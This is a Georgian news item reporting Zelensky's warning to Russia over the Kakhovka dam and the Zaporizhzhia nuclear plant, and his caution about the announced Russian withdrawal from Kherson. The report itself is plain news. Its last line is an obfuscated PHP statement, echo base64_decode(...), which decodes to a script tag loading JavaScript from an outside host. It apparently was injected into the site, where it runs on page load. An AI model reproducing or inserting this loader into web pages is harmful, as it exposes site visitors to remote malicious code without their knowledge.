celsiusi
ავერსი საქკაბელი
მინდა, კიდევ ერთხელ და ცალკე გავაფრთხილო ყველა, ვინც მოსკოვში შესაბამის გადაწყვეტილებებს იღებს – თქვენი ნებისმიერი მცდელობა, ააფეთქოთ კახოვსკის ჰიდროელექტროსადგური, დატბოროთ ჩვენი ტერიტორია და გააუწყლოოთ ზაპოროჟიეს ატომური ელექტროსადგური, ნიშნავს თქვენს მიერ ომის მთელი მსოფლიოსთვის გამოცხადებას, დაფიქრდით, რა დაგემართება, – ასე მიმართავს უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი რუსეთის ხელისუფლებას.
 
ზელენსკის თქმით, ახლა დონეცკის რეგიონში არის ყველაზე დიდი დაპირისპირება და იქ ბევრი რამ წყდება. მისივე თქმით, ნებისმიერი დანაკარგი იქ, არის ქვეყნის დანაკარგი.
 
პრეზიდენტის განცხადებით, ისინი ნელ-ნელა მიიწევენ წინ სამხრეთით და პოზიციებს იმაგრებენ. უკრაინის ლიდერი ასევე გამოეხმაურა რუსეთის მიერ გავრცელებულ განცხადებას ხერსონიდან შეიარაღებული ძალების გაყვანის შესახებ და განაცხადა, რომ უკრაინა სიფრთხილეს გამოიჩენს.
 
„დღეს საინფორმაციო სივრცეში ბევრი სიხარულია და გასაგებია, რატომაც. მაგრამ ჩვენი ემოციები უნდა იყოს მოზომილი – ყოველთვის ომის დროს. ნამდვილად არ გამოვკვებავ მტერს ჩვენი ოპერაციების ყველა დეტალით არც სამხრეთში, არც აღმოსავლეთში და არც სხვაგან. როცა ჩვენ შედეგი გვექნება, ამას ყველა დაინახავს. აუცილებლად. შესაძლოა, ეს არ ჟღერს ისე, როგორც ახლა ამას მოელიან. შესაძლოა, ისე არა, როგორც ეს ახალ ამბებშია. მაგრამ თქვენ უნდა გესმოდეთ: უბრალოდ არავინ არსად მიდის, თუ არ გრძნობს ძალას. მტერი საჩუქრებს არ გვიკეთებს, არც „კეთილი ნების ჟესტებს“. და როცა იბრძვი, უნდა გესმოდეს, რომ ყოველი ნაბიჯი მტერთან შეწინააღმდეგებაა. ამიტომ ძალიან ფრთხილად ვმოძრაობთ, ზედმეტი რისკების გარეშე. სწორედ ასე უზრუნველვყოფთ ხერსონის, კახოვკის, დონეცკისა და სხვა ქალაქების გათავისუფლებას“, -განაცხადა ზელენსკიმ.
 
 
420
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");